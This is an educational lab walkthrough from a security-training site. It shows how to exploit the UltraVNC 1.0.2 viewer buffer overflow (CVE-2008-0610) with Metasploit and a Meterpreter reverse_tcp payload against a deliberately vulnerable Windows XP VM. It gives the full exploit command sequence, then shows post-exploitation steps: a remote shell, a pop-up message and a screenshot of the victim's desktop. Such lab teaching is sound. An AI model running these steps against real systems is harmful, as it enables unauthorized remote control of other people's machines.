ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Metasploit >> Current Page |Views: 20379

(Metasploit: Lesson 15)

{ Illustrate the UltraVNC 1.0.2 Remote Exploit }


Section 0. Background Information
  1. What is the Background Story?
    • Similar to a malicious phishing links sent unsuspecting victim's email accounts, you also can set up malicious VNC Servers.  So, if an attacker is able to compromise the real VNC server with their own Malicious VNC server, then it would be possible to remotely connect to the victim machine.
     
  2. What is the UltraVNC?
    • UltraVNC (sometimes written uVNC) is an open source remote administration utility for Microsoft Windows that uses the VNC protocol to control another computer remotely over a network connection.
    • http://www.uvnc.com/products/uvnc-server.html

     
  3. What is the UltraVNC 1.0.2 Remote Exploit?
    • The CVE Vulnerability number is CVE-2008-0610.
    • Stack-based buffer overflow in the ClientConnection::NegotiateProtocolVersion function in vncviewer/ClientConnection.cpp in vncviewer for UltraVNC 1.0.2 and 1.0.4 before 01252008, when in LISTENING mode or when using the DSM plugin, allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a modified size value.

  4. What is Metasploit?
    • The Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.

  5. What is Damn Vulnerable Windows XP?
    • This is a Windows XP Virtual Machine that provides a practice environment to conduct ethical penetration testing, vulnerability assessment, exploitation and forensics investigation.
    • The Microsoft Software License Terms for the IE VMs are included in the release notes.
    • By downloading and using this software, you agree to these license terms.

  6. Pre-Requisite
  7. Lab Notes
    • In this lab we will do the following:
      1. Power on Damn Vulnerable WXP-SP2
      2. Power on Kali
      3. Use the Metasploit UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow Module (exploit/windows/vnc/ultravnc_viewer_bof) to connect remotely to the victim machine.
     
  8. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2015 No content replication of any kind is allowed without express written permission.

 

Section 1: Log into Damn Vulnerable WXP-SP2
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Edit Virtual Machine Settings
    • Note:
      • Before beginning a lesson it is necessary to check the following VM settings.

     

  3. Set Network Adapter
    • Instructions:
      1. Click on Network Adapter
      2. Click on the radio button "Bridged: Connected directly to the physical network".
      3. Click the OK Button

     

  4. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Start Up your VMware Player
      2. Play virtual machine

     

  5. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Administrator
      2. Password: Supply Password
        •  (See Note)
      3. Press <Enter> or Click the Arrow
    • Note(FYI):
      1. Password was created in (Lab 1, Section 1, Step 8)

     

  6. Open the Command Prompt
    • Instructions:
      1. Click the Start Button
      2. All Programs --> Accessories --> Command Prompt

     

  7. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
      2. Record Your IP Address
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine.

 

Section 2: Log into Kali
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Kali
      2. Edit Virtual Machine Settings
    • Note:
      • Before beginning a lesson it is necessary to check the following VM settings.

     

  3. Configure CD/DVD
    • Instructions:
      1. Click on CD/DVD
      2. Click on the radio button "Use physical drive:".
      3. Select Auto detect

     

  4. Set Network Adapter
    • Instructions:
      1. Click on Network Adapter
      2. Click on the radio button "Bridged: Connected directly to the physical network".
      3. Click the OK Button

     

  5. Start Up Kali
    • Instructions:
      1. Click on Kali
      2. Play virtual machine

     

  6. Supply Username
    • Instructions:
      1. Click Other...
      2. Username: root
      3. Click the Log In Button

     

  7. Supply Password
    • Instructions:
      1. Password: <Provide you Kali root password>
      2. Click the Log In Button

     

  8. Open a Terminal Window
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal

     

  9. Obtain IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      1. Your IP Address should be after the string "inet addr:"
      2. Mine is 192.168.1.109
      3. Please record your IP Address

 

Section 3: Configuring the VNC Exploit Listener
  1. Start the Metasploit Framework Console
    • Instructions:
      1. msfconsole

     

  2. Set Exploit
    • Instructions:
      1. use exploit/windows/vnc/ultravnc_viewer_bof
      2. info
    • Note(FYI):
      1. This module is the UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow.
      2. This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack.
      3. Reference

     

  3. Set Payload
    • Instructions:
      1. set PAYLOAD windows/meterpreter/reverse_tcp
    • Note(FYI):
      • Command #1, This Payload will Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Then it will connect back to the attacker.
      • A payload in metapsloit refers to an exploit module.  There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages.
      • Singles are payloads that are self-contained and completely standalone. A Single payload can be something as simple as adding a user to the target system or running calc.exe.
      • Stagers setup a network connection between the attacker and victim and are designed to be small and reliable.
      • Stages are payload components that are downloaded by Stagers modules. The various payload stages provide advanced features with no size limits such as Meterpreter, VNC Injection, and the iPhone 'ipwn' Shell.

     

  4. Module Requirements
    • Instructions:
      1. show options
    • Note(FYI):
      1. SRVHOST has "yes" under the Required field.  The SRVHOST is the IP address on which the VNC Server will be running to serve the VNC request to the victim machine.
      2. LHOST has a "yes" under the Required field.  This is very similar to the SRVHOST.  This is the address of the attacking machine, which in most cases will be the same as SRVHOST.

     

  5. Show Options
    • Note(FYI):
      1. Replace 192.168.1.109 with the IP Address retrieved from the ifconfig command.  (See Picture).
    • Instructions:
      1. ifconfig
      2. set SRVHOST 192.168.1.109
      3. set LHOST 192.168.1.109

     

  6. Start exploit VNC Listener
    • Instructions:
      1. exploit
    • Note(FYI):
      1. By typing exploit, the VNC listener is started and is listening in the background.
      2. Continue to next step

 

Section 4: Connect with UltraVNC Viewer
  1. Open UltraVNC Viewer (Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Click on the Start Button
      2. All Programs --> UltraVNC --> UltraVNC Viewer

     

  2. Start UltraVNC Viewer
    • Note(FYI):
      1. Replace 192.168.1.109 with your Kali IP Address found in (Section 2, Step 9).
    • Instructions:
      1. VNC Server: 192.168.1.109
      2. Click the Connect Button
      3. Continue to next step

     

  3. Close UltraVNC Viewer
    • Instructions:
      1. Notice the Status says Connection Closed.
      2. Click on the Cancel Button
    • Note(FYI):
      1. At first glance nothing happened right???
      2. Continue to the next step :)

 

Section 5: It's Metasploit Time!!!
  1. Meterpreter Session (On Kali)
    • Instructions:
      1. Press <Enter>
      2. sessions -l
        • Where (-l) is a lowercase L.
      3. sessions -i 1
        • See Command #2 in notes section.
    • Note(FYI):
      • Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API.
      • Command #1, Pressing <Enter> will return you back to a MSF prompt.  Notice there is now a Metasploit/Meterpreter session opened up from Kali (192.168.1.109) to Damn Vulnerable WXP-SP2 (192.168.1.116)
      • Command #2, Use (sessions -l) to display all meterpreter sessions.  Each meterpreter sessions is identified by an Id number.  Mine is 1.  Record your Id number and use it in step 4.
      • Command #3, use (sessions -i 1) to interact with the supplied session ID (1).

     

  2. Help Options
    • Instructions:
      1. help
    • Note(FYI):
      1. The help command displays the rich wealth of the meterpreter utilities.

     

  3. Command Shell
    • Note(FYI):
      1. Replace the Process ID (716) with your process ID located.  Your process ID is located below the shell command.  (See Picture).
    • Instructions:
      1. shell
        • You now have a remote command shell into the Window's machine.
      2. tasklist | findstr "716"
        • Replace 716 with your PID.
        • This PID is attached to the remote command shell.
      3. ipconfig
        • This is the IP address of the Window's machine.
      4. hostname
        • This is the hostname of the windows machine.
      5. Notice the Shell was spawned in "C\Program Files\UltraVNC"

     

  4. Pop Up Stuff
    • Note(FYI):
      1. Replace Your Name with your actual name.
      2. Only perform steps #4 and #5 if you don't see a meterpreter > prompt after typing exit. 
    • Instructions:
      1. calc
      2. msg * /TIME:3600 Exploited by (Your Name)
        • E.g., msg * /TIME:3600 Exploited by (John Gray)
      3. exit
      4. Press <Ctrl> and "c" at the same time
      5. y

     

  5. Capture Screenshot
    • Instructions:
      1. screenshot
      2. Highlight the saved file (See Picture)
      3. Right Click on the Highlighted file
      4. Click on Copy
    • Note(FYI):
      1. The screenshot utility grabs a screenshot of the victim's desktop.

     

Section 6: Proof of Lab
  1. Open Another Terminal Window
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal

     

  2. Display Captured Screenshot
    • Instructions:
      1. display
        • Do not press <Enter>
        • Make sure there is a space( ) after the word display
      2. Edit --> Paste
        • This will paste the picture copied from (Section 5, Step 5).
      3. Press <Enter>

     

  3. Proof of Lab (On Kali)
    • Instructions:
      1. Verify there is a Calculator in your picture
      2. Make sure the string "Your Name" is replaced with your actual name.
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth